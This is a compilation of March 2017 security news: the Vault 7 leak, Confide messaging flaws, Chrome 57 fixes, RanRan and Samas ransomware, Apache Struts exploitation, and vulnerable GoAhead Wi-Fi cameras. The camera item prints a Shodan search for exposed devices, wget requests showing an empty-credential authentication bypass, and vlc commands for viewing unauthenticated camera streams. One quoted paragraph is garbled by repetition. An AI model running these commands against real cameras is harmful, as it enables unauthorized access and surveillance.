“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday.” states the Reuters.
“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”
If confirmed, this is a very disconcerting particular, because it is not clear if the intelligence Agency has reported the incident to the IT vendors whom products could be targeted by the CIA hacking tools.
The CIA and the FBI have launched an investigation into the Wikileaks Vault7 Data leak, event if the Central Intelligence Agency did not confirm the authenticity of the huge trove of files.
The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.
“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.
“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.
The tools in the CIA arsenal appear to have been designed for targeted attacks instead of a dragnet surveillance. The CIA pointed out that it is not allowed to Intelligence agencies and law enforcement bodies spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”
According to the CIA, all the operations conducted by the US agencies “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”
The US Government is worried about the impact of the Vault 7 data leak on the activities conducted by US intelligence agencies. The revelations put at serious risk the efficiency of its tools and techniques.
Which are the reactions of other governments to the Wikileaks dump?
China expresses concerns at the revelations, the products of many Chinese companies may have been targeted by the CIA hackers.
“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies.” reported the Reuters..
“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.
Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”
The Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.
The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.
“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.
How Dutch Police Decrypted BlackBerry PGP Messages For Criminal Investigation
10.3.2017 thehackernews Crime
The Dutch police have managed to decrypt a number of PGP-encrypted messages sent by criminals using their custom security-focused PGP BlackBerry phones and identified several criminals in an ongoing investigation.
PGP, or Pretty Good Privacy, an open source end-to-end encryption standard that can be used to cryptographically sign emails, files, documents, or entire disk partitions in order to protect them from being spied on.
You'll be surprised to know how the police actually decrypted those PGP messages.
In April last year, the Dutch Police arrested a 36-year-old man on suspicion of money laundering and involvement in selling customized BlackBerry Phones with the secure PGP-encrypted network to criminals that were involved in organized crimes.
At the time, the police also seized a server belonging to Ennetcom, the company owned by Danny Manupassa, which contains data of end-to-end encrypted communications belong to a large number of criminal groups.
Later, in January this year, the Dutch investigators claimed they could decrypt emails stored on PGP-encrypted BlackBerry devices using commercially available tools, but that only applied to phones in possession of authorities.
However, the latest news concerns reading all of the encrypted messages that were on the seized server.
Dutch police said they have accessed to the contents of 3.6 Million messages stored on that server, and that they even have managed to decrypt a number of messages, despite supposedly being protected with end-to-end encryption, announced Openbaar Ministerie (the Public Prosecution Service) in a press release on Thursday.
Decrypting messages gave authorities access to evidence for dozens of criminal investigations into assassinations, drug trafficking, money laundering, armed robbery, attempted murder and other organized crime, which can lead to significant, decisive breakthroughs in criminal matters.
But the question remains:
How did the Police Decrypt the PGP-encrypted Messages?
Ennetcom sold some 20,000 encrypted BlackBerry phones that came preloaded with a number of security features, including PGP email, which apparently means that the email content should be protected even if it's intercepted or if authorities search its server.
However, the Dutch authorities discovered that the Ennetcom PGP BlackBerry devices routed user communications through its own infrastructure, a Canadian court filing reads.
And here the blunder comes into play: The "keys" for the PGP encryption system were generated by the company's server, rather by the device.
As a result, the Dutch authorities noticed that the keys to decrypt the PGP encrypted messages on the Ennetcom PGP BlackBerry devices are also stored on Ennetcom's BlackBerry Enterprise Servers.
The authorities then discovered a total of 7TB of data on the central server of Ennetcom in Canada and found that it was possible to read encrypted messages on the server.
In response to the Openbaar Ministerie press release, Ennetcom announced on its website that "the public prosecution has done these seizures under false pretenses," based on suspicion of money laundering with the excuse as if all the phone customers are criminals.
Multiple Security Gaps Found in Confide Messaging App
10.3.2017 securityweek Vulnerebility
Multiple vulnerabilities recently found in the Confide messaging application could allow an attacker to leak session information, enumerate users, and even access details such as emails and phone numbers.
Confide is promoted as a “confidential messenger” that allows users to speak freely, without fearing eavesdropping, courtesy of “military grade end-to end-encryption.” However, security researchers with IOActive and Quarkslab have discovered that users’ conversations were actually exposed to man-in-the-middle (MiTM) attacks, and also uncovered various other vulnerabilities in the messenger.
In a recent report (PDF), IOActive notes that the application’s notification system did not require a valid SSL server certificate to communicate, thus leaking session information to MiTM attacks. Furthermore, the app allowed for unencrypted messages to be delivered, without alerting the user on the matter.
During their analysis, IOActive researchers also found that the software was uploading file attachments before the user sent the intended message, and that it allowed attackers to send malformed messages that could crash, slow, or otherwise disrupt the application.
Furthermore, the application didn’t use authenticated encryption, meaning that Confide was able to alter messages in-transit, an issue discovered by Quarkslab’s Jean-Baptiste Bédrune, who published a comprehensive technical analysis detailing how Confide could perform man-in-the-middle attacks and read users’ messages.
According to Bédrune, the application didn’t use a cryptographic integrity mechanism and the cryptographic protocol did not involve authentication. When notified of a new message, the client would request a list of unread threads from the server, but had no means to verify the origin of the message and to check the sender's public key authenticity either.
“The most obvious problem is […] linked to the fact that the encrypted message origin and the authenticity of the public encryption key transmitted by the server can in no way be verified by the client,” the researcher notes. The Confide server could generate its own key pair and transmit the public part to a client, decrypt the messages sent by the client, and re-encrypt them with its own key for the actual recipient, Bédrune claims.
Other major issues discovered (PDF) by IOActive were related to account management, as it provided an attacker with the possibility to enumerate all Confide user accounts. Furthermore, the app didn’t employ a mechanism to adequately prevent brute-force attacks on user account passwords and even short, easy-to-guess passwords were allowed.
The application's website was also found to be vulnerable. Specifically, researchers discovered an arbitrary URL redirection in it and say that this could facilitate social engineering attacks against users. Additionally, the website was observed reflecting incorrectly entered passwords back to the browser.
By exploiting the vulnerabilities, an attacker could impersonate another user by hijacking their account session or by guessing their password, learn the contact details of all or specific Confide users, become an intermediary in a conversation and decrypt messages, or alter the contents of a message or attachment in transit without first decrypting it, IOActive says.
An attacker could also leak a great deal of user information, such as: usernames; whether the user has clicked the provided verification link; userIDs; the users’ public keys; the users’ phone numbers; and the users’ email addresses.
The security company tested Confide messaging app versions 4.0.4 for Android and 1.4.2 for Windows and Mac OS X and says it was able to recover more than 7,000 records for users registered between February 22-24, 2017. IOActive estimates that “between 800,000 and one million user records were potentially contained in the database.”
“Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning. The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass,” Bédrune notes.
Confide was alerted on the discovered issues and has already updated its mobile and desktop applications to address some of them. The company also confirmed that it could theoretically perform MiTM attacks against its users, but also says that it plans on releasing another update to add support for independent fingerprint verification.
WikiLeaks to Share CIA Hacking Tools With Tech Firms
10.3.2017 securityweek BigBrothers
WikiLeaks has decided to share information on the alleged CIA hacking tools with the tech companies whose products are affected, but the White House has warned that there may be legal repercussions.
The Vault 7 files made public this week by WikiLeaks appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile and desktop devices, networking equipment, and Internet of Things (IoT) devices.
The products of several major companies are mentioned in the leaks and many of them have asked the whistleblower organization to share additional information to help them ensure that their customers are protected against possible cyberattacks.
While it has published numerous documents containing technical information, WikiLeaks initially said it would not release any actual tools or exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.”
However, WikiLeaks founder Julian Assange said in a press conference on Thursday that the decision to not release the exploits limits the ability of vendors to issue security fixes. That is why WikiLeaks has decided to share information with impacted companies.
“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”
It’s worth noting that WikiLeaks has launched a poll on Twitter, asking users if more details should be shared with tech companies, and 57 percent of respondents said “Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”
While the decision to share technical details with technology companies may be good news, White House representatives have warned about the possible legal repercussions for these firms.
“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”
Based on the information made public by WikiLeaks, security firms and major tech companies such as Microsoft, Apple and Google have determined that many of the vulnerabilities leveraged by the alleged CIA tools don’t affect the latest versions of their products. In fact, some of the flaws were patched several years ago.
The CIA has refused to comment on the authenticity of the leaked documents, but pointed out that the agency is legally prohibited from spying on individuals in the United States.
Chrome 57 Patches 35 Vulnerabilities
10.3.2017 securityweek Vulnerebility
Google announced on Thursday that the stable channel of its Chrome web browser has been updated to version 57 on Windows, Mac and Linux.
The latest version brings several new features, including the availability of CSS Grid Layout, and various functionality improvements. Chrome 57 also patches 35 vulnerabilities, more than half of which were reported by external researchers who earned a total of $38,000 for their work.
The most serious of the flaws, based on the bounty amount, is a memory corruption bug (CVE-2017-5030) in the V8 JavaScript engine. Brendon Tiszka received $7,500 for this find.
Researcher Looben Yang earned $5,000 for a use-after-free vulnerability (CVE-2017-5031) in the Almost Native Graphics Layer Engine (ANGLE).
Other high severity vulnerabilities, which earned experts between $500 and $3,000, have been described as an out-of-bounds write in PDFium, an integer overflow in libxslt, three use-after-free weaknesses in PDFium, incorrect security UI in Omnibox, and multiple out-of-bounds writes in ChunkDemuxer.
The medium severity flaws patched in Chrome 57 have been described as an address spoofing issue in Omnibox, bypass of the content security policy in Blink, incorrect handling of cookies in Cast, a heap overflow in Skia, a couple of use-after-free bugs in GuestView, and information disclosures in V8, XSS Auditor and Blink.
The list of researchers credited for finding the security holes patched with the release of Chrome 57 includes Ashfaq Ansari of Project Srishti, Holger Fuhrmannek, Ke Liu of Tencent, Enzo Aguado, Yongke Wang of Tencent, Choongwoo Han, jinmo123, Jordi Chancel, Nicolai Grødum, Mike Ruddy, Kushal Arvind Shah of Fortinet, Dhaval Kapil and Masato Kinugawa. Some of the individuals who reported vulnerabilities wanted to remain anonymous.
Google has paid out more than $9 million since the launch of its bug bounty program in 2010, including more than $3 million last year. As vulnerabilities become more difficult to find, the tech giant has decided to offer more money for critical issues. Last week, the company informed researchers that the reward for remote code execution vulnerabilities has increased to $31,337.
Middle East Government organizations hit with RanRan Ransomware
10.3.2017 securityaffairs Virus
Palo Alto Networks discovered a new strain of ransomware, dubbed RanRan ransomware, that has been used in targeted attacks in Middle East.
Malware researchers at Palo Alto Networks have spotted a new strain of ransomware, dubbed RanRan, that has been used in targeted attacks against government organizations in the Middle East.
“Recently, Unit 42 has observed attacks against multiple Middle Eastern government organizations using a previously unseen ransomware family. Based on embedded strings within the malware, we have named this malware ‘RanRan’. ” reads the analysis published by PaloAlto Networks.
The threat actors instead of asking for a ransom are requesting victims to make a political statement on their website to decrypt their files.
RanRan is able to encrypt various types of files stored on the infected system, including documents, executables, logs, databases, archives, source code, images and video files. The ransomware appends the .zXz extension to encrypted files and adds an HTML file containing instructions on how to recover the files onto the target system.
Victims are told not to shut down their system or run any antivirus solution in order to avoid “accidental damage on files.”
The crooks behind the RanRan ransomware instruct victims to create a subdomain with a political name on their website.
Victims are also instructed to upload to the subdomain a file named “Ransomware.txt” containing the text message “Hacked!” and the email address of the attacker.
“The ransom note specifically attempts to extort a political statement by forcing the victims to create a public sub-domain with a name that would appear to advocate and incite violence against a Middle Eastern political leader.” continues the analysis.
“The malware itself is fairly rudimentary and makes a number of mistakes in how files are encrypted. This allowed Unit 42 to create a script that is able to decrypt some files that were encrypted by RanRan.”
According to PaloAlto Networks, the intent is to force victims to disclose the hack and publish a statement against the leader of its country.
RanRan ransomware
The security firm did not reveal the name of the targeted organizations neither attributed the attacks to a specific threat actor.
“By performing these actions, the victim, a Middle Eastern government organization, has to generate a political statement against the leader of the country,” said Palo Alto Networks researchers. “It also forces the victim to publicly announce that they have been hacked by hosting the Ransomware.txt file.”
The analysis of the malware revealed that the threat is not sophisticated, the malware researchers also spotted some mistakes in the implementation the of the file encryption feature. which appears to be based on publicly available
The RanRan ransomware seems to be based on publicly available source code.
“RanRan makes a number of mistakes when encryption occurs,” continues the analysis published by PaloAlto Networks.
“For one, they use a symmetric cipher (RC4) with a re-used key. Additionally, some files are encrypted, but the originals are not deleted. This is due to a number of reasons, one of which being that encryption is attempted against system files and other files that are opened by running processes.”
The good news it that due to the errors in the encryption process, victims of RanRan could decrypt some of the files under specific conditions.
“Because we are provided with a situation where we have an original file, a file that has been encrypted, and the RC4 key is re-used against other encrypted files, we have the ability to decrypt some of this data.” continues the analysis.
“This only works in certain instances where the following criteria is met:
An encrypted and unencrypted file must be present for a given file size group (0-5MB, 5-30MB, etc). Using these two files, we are able to acquire the RC4 stream cipher.
The remaining encrypted files must be of lesser size than the previously obtained stream cipher. If a file is of greater size, it is only able to be partially decrypted.”
640,000 stolen PlayStation accounts being sold on the Dark Web
10.3.2017 securityaffairs Incindent
The seller that goes online with moniker SunTzu583 is offering 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC), it source is still a mystery.
The dark web is the right place where to buy stolen login credentials to major web services, last week the colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by a seller that goes online with the “SunTzu583” moniker
A few days later, the same vendor that was offering Gmail and Yahoo accounts for sale started selling PlayStation accounts.
SunTzu583 is offering for sale 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC). The source of the stolen accounts is not clear, the dump includes emails and clear-text passwords.
SunTzu583 confirmed that the archive was not directly stolen from PlayStation network, but it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services they are first of all PlayStation accounts.
A few months ago, several Playstation users reported their accounts have been hacked and that crooks have stolen the funds. Sony denied its server were hacked by crooks and added that the PlayStation accounts were accessed by using credentials from third-party data breaches.
At the time I was writing there is no confirmation about the authenticity of the 640,000 PlayStation accounts.
It is any way suggested to change the passwords for PS accounts, as usual, it is important to share the passwords for all the websites for which use the same login credentials.
Recently other gaming platforms were hacked, including the Clash of Clans forum, ESEA, and Epic Games.
Avast: Dokumenty na WikiLeaks neobsahují bezpečnostní mezery
9.3.2017 Novinky/Bezpečnost BigBrother
Zveřejněné dokumenty serveru WikiLeaks neodhalují v české firmě Avast žádné bezpečnostní mezery, navíc jsou dva roky staré. Řekl to viceprezident Avastu Sinan Eren v reakci na informaci, že Avast figuruje v dokumentech WikiLeaks jako jeden z prodejců bezpečnostního softwaru, na který se zaměřila americká Ústřední zpravodajská služba (CIA).
Portál WikiLeaks zveřejnil kolem 8000 stran dokumentů o útočném programovém arzenálu CIA, s nímž největší americká výzvědná organizace může pronikat do mobilních telefonů, chytrých televizorů a dalších elektronických zařízení a využít je ke shromažďování informací.
„Avast je zmíněn ve zveřejněných dokumentech, stejně jako další globální bezpečnostní firmy. Nicméně zveřejněné dokumenty neodhalují v Avastu žádné bezpečnostní mezery. Jde navíc o veřejně dostupné dokumenty a prezentace z konferencí, které jsou dva roky staré," uvedl Eren.
Dokumenty mají dostatek technických podrobností
Důvody zájmu CIA o Avast, který je jedním z největších dodavatelů bezpečnostního softwaru na světě, mohou být podle bezpečnostního experta sdružení CZ.NIC Pavla Bašty dva. „Avast dodává bezpečnostní řešení, která používají stovky miliónů uživatelů na celém světě, a z pohledu CIA může být zajímavé, pokud by dokázala tato bezpečnostní řešení ošálit tak, aby nepoznala škodlivý software vytvořený CIA a zároveň dál uživatele informovala o jiných nákazách," řekl.
„Druhým faktorem může být, že stejně jako jakýkoliv jiný hojně rozšířený software by mohly produkty společnosti Avast posloužit k šíření škodlivých programů, pokud by se CIA podařilo v těchto produktech najít vhodnou zneužitelnou chybu," dodal.
Publikované dokumenty podle agentury Reuters obsahují dostatek technických podrobností, aby bezpečnostní experti a prodejci ochranného softwaru pochopili, jak rozsáhlé bezpečnostní mezery existují. Poskytují ale málo detailů, které by mohly napomoci rychlé nápravě.
Společnost Avast, založená v roce 1988, se zabývá tvorbou bezpečnostního softwaru a její antivirové programy chrání přes 400 miliónů počítačů a mobilních zařízení ve světě. Loni koupila konkurenční českou firmu AVG.
Danger děsí bezpečnostní experty, počet útoků stoupá
9.3.2017 Novinky/Bezpečnost Viry
Nejrozšířenější kybernetickou hrozbou byl v únoru škodlivý kód Danger. Bezpečnostní experti varovali především před tím, že počet útoků tohoto nezvaného návštěvníka dramaticky stoupá. Vyplývá to z analýzy antivirové společnosti Eset.
Danger byl loni nejrozšířenější hrozbou vůbec. Zkraje letošního roku však jeho podíl začal citelně klesat. Vše tedy nasvědčovalo tomu, že je tento nezvaný návštěvník na ústupu.
Nyní se však ukazuje, že opak je pravdou. „V lednu jsme zaznamenali výrazný pokles detekcí tohoto malwaru. Z měsíce na měsíc se snížil o 40 procentních bodů. V únoru se však podíl downloaderu Danger na celkových internetových hrozbách začal znovu zvyšovat až na více než 20 procent,“ konstatoval Miroslav Dvořák, technický ředitel společnosti Eset.
Virus, plným názvem JS/Danger.ScriptAttachment, je velmi nebezpečný. Otevírá totiž zadní vrátka do operačního systému. Útočníci pak díky němu mohou propašovat do napadeného počítače další škodlivé kódy, nejčastěji tak šíří vyděračské viry z rodiny ransomware.
Hrozbu představují i Adwind a Nemucod
Danger nicméně není jediným škodlivým kódem, který dělá bezpečnostním expertům vrásky na čele. „V únoru posiloval i škodlivý kód Adwind, který představoval 6,86 procenta zachycených detekcí. Jde o backdoor, který cílí na systémy podporující Java runtime prostředí,“ uvedl Dvořák.
„Adwind funguje jako zadní vrátka. To znamená, že odesílá informace o napadeném systému a přijímá příkazy od vzdáleného útočníka. Může jít například o zobrazení zprávy v systému, otevření konkrétní internetové stránky, aktualizaci malwaru nebo stažení a spuštění nějakého souboru,“ doplnil.
Ten zároveň zdůraznil, že Adwind měl v uplynulém měsíci podíl 6,86 %. To je jen nepatrně více než v případě třetí nejrozšířenější hrozby – škodlivého kódu Nemucod. Také s pomocí tohoto viru mohou počítačoví piráti do napadeného stroje stahovat další škodlivé kódy, podobně jako v případě Dangeru.
Přehled deseti nejrozšířenějších virových hrozeb za uplynulý měsíc naleznete v tabulce níže:
Deset nejrozšířenějších počítačových hrozeb v ČR – únor 2017
1. JS/Danger.ScriptAttachment (20,94 %)
2. Java/Adwind (6,86 %)
3. JS/TrojanDownloader.Nemucod (6,33 %)
4. JS/ProxyChanger (4,36 %)
5. JS/TrojanDownloader.Agent.PQT (2,48 %)
6. Win32/Adware.ELEX (1,56 %)
7. Win32/Packed.VMProtect.AAA (1,56 %)
8. Win32/Packed.VMProtect.ABO (1,48 %)
9. JS/Kryptik.RE (1,24 %)
10. Win32/GenKryptik (1,24 %)
Researchers discovered severe flaws in the Confide which is also used by White House staffers
9.3.2017 securityaffairs Vulnerebility
Confide App, the secure messaging app used by staffers in the White House and on Capitol Hill is not as secure as the company claims.
Confide is the secure messaging app used by President Donald Trump’s staffers for their secret communication. The official website of the application defines the encryption implemented by the mobile application with this statement:
“Confide uses military-grade end-to-end encryption to keep your messages safe and to ensure they can only be read by the intended recipients.” states the website.
The app allows users to send encrypted messages that self-destruct implementing end-to-end encryption.
News of the day is that two separate studies revealed that Confide app is not secure as previously thought.
The experts at the security firm IOActive discovered multiple critical flaws in the Confide app while auditing the version 1.4.2 for Windows, Mac OS X, and Android. The researchers ethically reported them to the Confide development team that quickly resolved the issue.
“During the evaluation, multiple security vulnerabilities of varying severities were identified, with corresponding attacker exploitation risks ranging from account impersonation and message tampering, to exposing user contact details and hijacking accounts.” reads the analysis published by IOActive.
According to IOActive, the confide flaws could be exploited for the following purposes:
Hijack an account session or guess a password to impersonate contacts. The Confide app failed to prevent brute-force attacks on account passwords.
Spy on contact details of Confide users (i.e. real names, email addresses, and phone numbers).
Intercept a conversation and decrypt messages. The researchers discovered that it is possible to launch MiTM attacks because the app’s notification system didn’t require any valid SSL server certificate to communicate. An attacker can capture messages in transit.
Modify the contents of a message or attachment in transit without first decrypting it.
Send malformed messages that can crash or slow the Confide application.
According to the research paper published by IOActive, the researchers gained access to more than 7,000 account records created between February 22 and 24, out of a database containing between 800,000 and 1 Million records.
During their 2-day test, the team was able to find a Donald Trump associate and several employees from the Department of Homeland Security (DHS) who downloaded the Confide app.
Below the Timeline disclosed by IOActive:
Timeline February 2017: IOActive conducts testing on the Confide application.
February 25, 2017: Confide begins fixing issues uncovered by the detection of anomalous behavior during the testing window.
February 27, 2017: IOActive contacts Confide via several public email addresses to establish a line of communication.
February 28, 2017: IOActive discloses issues to Confide. Confide communicates that some mitigations are already in progress and plans are being made to address all issues.
March 2, 2017: Confide releases an updated Windows client (1.4.3), which includes fixes that address some of IOActive’s findings.
March 3, 2017: Confide informs IOActive that remediation of critical issues is complete.
March 8, 2017: Findings are published.
As anticipated, a separate team of experts from Quarkslab also reviewed the code of the iOS app and demonstrated Confide exploits.
According to the experts, a series of design vulnerabilities in the Confide for iOS app could allow the company to read user messages, adding that the app didn’t notify users when encryption keys were changed.
“Confide server can read your messages by performing a man-in-the-middle attack” “The end-to-end encryption used in Confide is far from reaching the state of the art. Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning.” reads the analysis of Quarkslab.
“The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass.”
Confide is not just an encrypted messenger. It provides other interesting security features:
Screenshot prevention: Received messages can theoretically not be copied by a user. As the astute reader may have noticed, the previous paragraphs present screenshots of the application.
Message deletion: Once a user reads a message, it is deleted from the client and from the server. Is it possible to prevent message deletion?
Secrets protection: Confide handle secrets, like private keys required to decrypt messages. Are these keys correctly protected?“
The Quarkslab researchers explained that Confide server could generate its own key pair and transmit the public key to a client when requesting the public key of a recipient.
“This client then unknowingly encrypts a message that can be decrypted by the server,” the researchers added. “Finally, when the server sends the message to the recipient, it is able to re-encrypt the message with its own key for the actual recipient.”
Which is reply of the company?
In response to the analysis conducted by Quarkslab, Confide co-founder and president Jon Brod explained that the researchers have intentionally undermined the security of their own system to bypass several layers of Confide’s protection.
“The researchers intentionally undermined the security of their own system to bypass several layers of Confide’s protection, including application signatures, code obfuscation, and certificate pinning. The attack that they claim to be demonstrating does not apply to legitimate users of Confide, who are benefiting from multiple security protections that we have put in place. Undermining your own security or taking complete control of a device makes the entire device vulnerable, not just the Confide app.” said Brod.
Confide has released a version that fixes the critical vulnerabilities discovered by the researchers. According to the company, there is no evidence for their exploitation by attackers in the wild.
Patch Apache Struts 2 Now! Hackers are exploiting a remote code execution zero-day in the wild
9.3.2017 securityaffairs Exploit
Researchers have spotted a remote code execution zero-day in Apache Struts 2, the flaw has being exploiting by that threat actors in the wild.
Security researchers have spotted a remote code execution zero-day, tracked as CVE-2017-5638, in Apache Struts 2, and the bad news is that threat actors in the wild are already exploiting it.
According to the experts from Cisco Talos that flaws affected the Jakarta-based file upload Multipart parser under Apache Struts 2, sys admins need to urgently apply the security upgrade. The CVE-2017-5638 is documented at Rapid7’s Metasploit Framework GitHub site, attackers in the wild are exploiting a publicly available PoC code that triggers the issue.
“Talos has observed a new Apache vulnerability that is being actively exploited in the wild. The vulnerability (CVE-2017-5638) is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, referenced in this security advisory.” reads the security advisory published by the Talos group. “Talos began investigating for exploitation attempts and found a high number of exploitation events.”
The issue was first spotted by the Chinese developer Nike Zheng, the attack sends an invalid Content-Type value to the uploader throwing an exception creating the condition for the remote code execution.
The attackers can exploit the vulnerability to remotely take over a system as explained by Qualys who also shared a probe (QID 11771 in VULNSIGS-2.3.559-2) to detect the presence of this issue.
“A remote code execution vulnerability exists in Apache Jakarta multipart parser. If exploited, this issue can allow attacker to remotely and without needtake complete control of the system. Needless to say we think this is a high priority issue and the consequence of a successful attack is dire. The issue is triggered when the software tries to parse the need of any credentials take complete control of the system. Needless to say we think this is a high priority issue and the consequence of a successful attack is dire. The issue is triggered when the software tries to parse the Content-Type HTTP header. “
Below there is an example of some simple probing attacks detected by Talos group, the attempts are ongoing, attackers just check to see if a system is vulnerable by executing a simple Linux based command.
“The majority of the exploitation attempts seem to be leveraging a publicly released PoC that is being used to run various commands. Talos has observed simple commands (i.e. whoami) as well as more sophisticated commands including pulling down a malicious ELF executable and execution. ” reads the analysis shared by Talos.
The experts also observed malicious attacks that which turn off firewall processes on the target servers and then drop malicious payloads.
“This example is a little more aggressive with its attack. The steps include stopping the Linux firewall as well as SUSE Linux firewall. Final steps include downloading a malicious payload from a web server and execution of said payload. The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet. This isn’t uncommon for Linux based compromise as a payload is downloaded and executed from a privileged account.” continues Talos.
The researchers also observed more sophisticated attack that attempt to trigger the issue to gain persistence on the target,
“The difference with this particular example is the attempted persistence. The adversary attempts to copy the file to a benign directory and then ensure that both the executable runs and that the firewall service will be disabled when the system boots.”
Do you want your own IoT botnet? 185,000+ Wi-Fi-connected cameras are open to hack
9.3.2017 securityaffairs BotNet
The researcher Pierre Kim revealed that more than 185,000 vulnerable Wi-Fi-connected cameras are exposed to the Internet, ready to be hacked.
According to the security advisory published by Pierre Kim via Full Disclosure, more than 185,000 vulnerable Wi-Fi-connected cameras are exposed to the Internet, a gift for crooks and hackers.
The devices are affected by the following vulnerabilities:
Backdoor account
RSA key and certificates
Pre-Auth Info Leak (credentials) within the GoAhead http server
Authenticated RCE as root
Pre-Auth RCE as root
Misc – Streaming without authentication
Misc – “Cloud” (Aka Botnet)
Locate the flawed Wi-Fi-connected cameras is quite simple using a search engine like Shodan, below the query used by Kim to discover the vulnerable devices:
https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41
at the time I was writing the query gets 197,318 results, the vulnerabilities could be exploited by cyber criminals to recruit the devices in a IoT botnet that could be used for multiple illegal activities.
The most disconcerting aspect of the story is that a CGI script running on the Wi-Fi-connected cameras for configuring FTP is affected by a remote code execution vulnerability that was discovered back in 2015, yes two years ago.
To browse .cgi files, an attacker needs to authenticate too:
user@kali$ wget -qO- ‘http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS’
var result=”Auth Failed”;
user@kali$ wget -qO- ‘http://192.168.1.107/get_params.cgi?loginuse&loginpas’
var result=”Auth Failed”;
According to Kim, the access to .ini files is not correctly checked allowing attackers to bypass the authentication by providing an empty loginuse and an empty loginpas in the URI.
Attackers can exploit the vulnerability to run commands as root or start a password-less Telnet server.
The expert discovered that a folder in the file system, /system/www/pem/ck.pem, includes an Apple developer certificate with a private RSA key, and credentials for the Web server leak to an unauthenticated attacker via the system.ini and system-b.ini symbolic links.
The Wi-Fi-connected cameras run an unauthenticated real-time streaming protocol (RTSP) server, this means that if an attacker is able to see the camera’s TCP port 10554, he can watch what it streams.
“An attacker can use the authenticated-less RTSP server running on the camera on the port
10554/tcp
to watch the streaming without authentication.
user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1
And:
user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0
” explained Kim in a detailed analysis.
Another security hole is represented by the cloud capability implemented by the firmware that is enabled by default, with pre-configured connections to AWS, Alibaba, and Baidu.
In order to access the cloud, the attacker needs to use a smartphone application such a P2PWificam and Netcam360 by providing the serial number of the target device.
“if the camera is online, a UDP tunnel is automaticaly established between the application and the camera, using the Cloud server as a relay.” he explained.
“The UDP tunnel between the attacker and the camera is established even if the attacker doesn’t know the credentials. It’s useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials.” reads the security advisory.
The analysis published by the expert on GitHub includes proof-of-concept code, enjoy it.
Samas Ransomware Uses Active Directory to Infect Entire Networks
9.3.2017 securityweek Virus
Samas Ransomware Uses Active Directory for Reconnaissance and Spreads Across the Entire Network to Encrypt Files on Every Server and Computer
The actors behind Samas, a ransomware family that emerged about a year ago, are using Active Directory to perform reconnaissance and then infect entire networks, Javelin Networks says.
First detailed in March last year, Samas was observed employing publicly-available penetration testing tools for delivery, and its operators were said to have made $450,000 in ransom payments by December 2016. The malware has been targeting mainly the healthcare industry, researchers explain in a report SecurityWeek received via email.
Unlike most ransomware out there, which focuses mainly on encrypting local files, Samas spreads inside the entire network to encrypt files on every server and computer, the researchers say. This operation is performed in three steps: the attackers steal domain credentials, identify targets via Active Directory reconnaissance, and then move laterally through the network.
Javelin Networks, which compares this modus operandi with that of a worm, which usually spreads itself throughout the entire network, explains that the ransomware’s operators exploit a JBoss JMX-Console Authentication bypass (CVE-2010-0738) in front-facing servers to gain access to the network. Once inside the network, the attacker uses various tools to extract and steal domain admin credentials and act as a legitimate user.
The next step involves the identification of targets to encrypt, an operation performed using by querying Active Directory, “because it stores all the corporation’s information. It’s a database that stores all users, endpoints, applications, and servers,” the researchers explain. Using the CSVDE command-line Windows utility, the attacker can obtain the necessary information without risking exposure.
The attacker can then check active hosts using the PING command, and can install the malicious module on them using yet another Windows utility: PSEXEC. Because this is a legitimate, built-in command tool that IT managers use for remote control, the attack goes undetected.
